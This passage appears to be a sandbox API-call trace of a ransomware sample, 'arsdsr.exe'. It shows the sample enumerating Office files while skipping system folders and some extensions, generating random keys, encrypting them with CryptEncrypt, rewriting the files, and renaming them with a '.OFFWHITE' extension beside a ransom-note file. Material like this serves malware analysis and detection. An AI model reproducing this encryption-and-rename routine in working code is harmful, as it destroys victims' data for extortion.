lpString2="appdata") returned 1 [0145.537] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="program files") returned -1 [0145.537] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="program files (x86)") returned -1 [0145.537] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.537] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="MOR6INT.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" [0145.537] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.537] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.537] PathFindExtensionW (pszPath="MOR6INT.REST.trx_dll") returned=".trx_dll" [0145.537] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.537] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.537] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.538] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.538] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.538] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.538] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.538] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.538] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.538] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.538] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.538] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.538] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.538] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.538] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.538] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0145.538] GetProcessHeap () returned 0x500000 [0145.538] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546db8 [0145.538] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.541] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=49504) returned 1 [0145.541] GetProcessHeap () returned 0x500000 [0145.541] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.541] GetProcessHeap () returned 0x500000 [0145.541] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.541] GetProcessHeap () returned 0x500000 [0145.541] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.541] GetProcessHeap () returned 0x500000 [0145.541] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.541] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.541] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.541] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.541] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.541] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.541] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.541] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.542] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.542] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.542] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.542] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.542] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.542] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xc160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.542] SetLastError (dwErrCode=0x0) [0145.542] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.547] GetLastError () returned 0x0 [0145.547] GetLastError () returned 0x0 [0145.547] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xc260, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.547] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.547] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xc360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.547] WriteFile (in: hFile=0x218, lpBuffer=0x546db8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546db8*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.547] GetProcessHeap () returned 0x500000 [0145.547] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xc160) returned 0x5607c8 [0145.547] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.547] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0xc160, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0xc160, lpOverlapped=0x0) returned 1 [0145.552] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.552] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0xc160, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0xc160, lpOverlapped=0x0) returned 1 [0145.553] GetProcessHeap () returned 0x500000 [0145.553] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.553] CloseHandle (hObject=0x218) returned 1 [0145.553] GetProcessHeap () returned 0x500000 [0145.553] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.553] GetProcessHeap () returned 0x500000 [0145.553] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.553] GetProcessHeap () returned 0x500000 [0145.553] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.553] GetProcessHeap () returned 0x500000 [0145.553] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.553] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" [0145.553] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.OFFWHITE" [0145.553] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll.offwhite")) returned 1 [0145.554] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x248aaf00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x248aaf00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x16f60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="MSOINTL.DLL.trx_dll", cAlternateFileName="MSOINT~1.TRX")) returned 1 [0145.554] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2=".") returned 1 [0145.554] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="..") returned 1 [0145.554] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="...") returned 1 [0145.554] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="windows") returned -1 [0145.554] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.554] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="rsa") returned -1 [0145.554] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0145.555] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="programdata") returned -1 [0145.555] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="appdata") returned 1 [0145.555] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="program files") returned -1 [0145.555] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0145.555] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.555] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="MSOINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" [0145.555] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.555] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.555] PathFindExtensionW (pszPath="MSOINTL.DLL.trx_dll") returned=".trx_dll" [0145.555] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.555] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.555] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.555] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.555] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.555] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.555] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.555] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.555] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.555] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.555] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.556] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.556] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.556] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.556] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.556] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0145.556] GetProcessHeap () returned 0x500000 [0145.556] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546dc8 [0145.556] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.556] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=94048) returned 1 [0145.556] GetProcessHeap () returned 0x500000 [0145.556] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.556] GetProcessHeap () returned 0x500000 [0145.556] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.556] GetProcessHeap () returned 0x500000 [0145.556] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.557] GetProcessHeap () returned 0x500000 [0145.557] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.557] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.557] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.557] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.557] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.557] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.557] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.557] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.557] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.557] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.557] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.557] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.557] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.557] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x16f60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.558] SetLastError (dwErrCode=0x0) [0145.558] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.560] GetLastError () returned 0x0 [0145.560] GetLastError () returned 0x0 [0145.560] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x17060, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.560] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.560] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x17160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.560] WriteFile (in: hFile=0x218, lpBuffer=0x546dc8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546dc8*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.560] GetProcessHeap () returned 0x500000 [0145.560] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x16f60) returned 0x5607c8 [0145.560] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.561] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x16f60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x16f60, lpOverlapped=0x0) returned 1 [0145.568] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.568] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x16f60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x16f60, lpOverlapped=0x0) returned 1 [0145.568] GetProcessHeap () returned 0x500000 [0145.568] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.568] CloseHandle (hObject=0x218) returned 1 [0145.569] GetProcessHeap () returned 0x500000 [0145.569] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.569] GetProcessHeap () returned 0x500000 [0145.569] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.569] GetProcessHeap () returned 0x500000 [0145.569] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.569] GetProcessHeap () returned 0x500000 [0145.569] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.569] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" [0145.569] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.OFFWHITE" [0145.569] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll.offwhite")) returned 1 [0145.570] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x25bbdc00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x25bbdc00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x2b2560, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="MSOINTL.REST.trx_dll", cAlternateFileName="MSOINT~2.TRX")) returned 1 [0145.570] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2=".") returned 1 [0145.570] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="..") returned 1 [0145.570] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="...") returned 1 [0145.570] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="windows") returned -1 [0145.570] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0145.570] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="rsa") returned -1 [0145.570] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="ntuser.dat") returned -1 [0145.570] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="programdata") returned -1 [0145.570] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="appdata") returned 1 [0145.570] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="program files") returned -1 [0145.570] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="program files (x86)") returned -1 [0145.570] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.570] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="MSOINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" [0145.571] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.571] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.571] PathFindExtensionW (pszPath="MSOINTL.REST.trx_dll") returned=".trx_dll" [0145.571] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.571] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.571] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.571] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.571] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.571] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.572] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.573] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.573] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.573] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.573] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.573] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.573] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.573] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.573] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.573] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0145.573] GetProcessHeap () returned 0x500000 [0145.573] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546dd8 [0145.573] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.573] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=2827616) returned 1 [0145.573] GetProcessHeap () returned 0x500000 [0145.574] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.574] GetProcessHeap () returned 0x500000 [0145.574] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.574] GetProcessHeap () returned 0x500000 [0145.574] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.574] GetProcessHeap () returned 0x500000 [0145.574] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.574] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.574] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.574] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.574] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.574] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.574] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.574] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.574] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.574] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.574] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.574] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.574] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.575] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x2b2560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.575] SetLastError (dwErrCode=0x0) [0145.575] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, 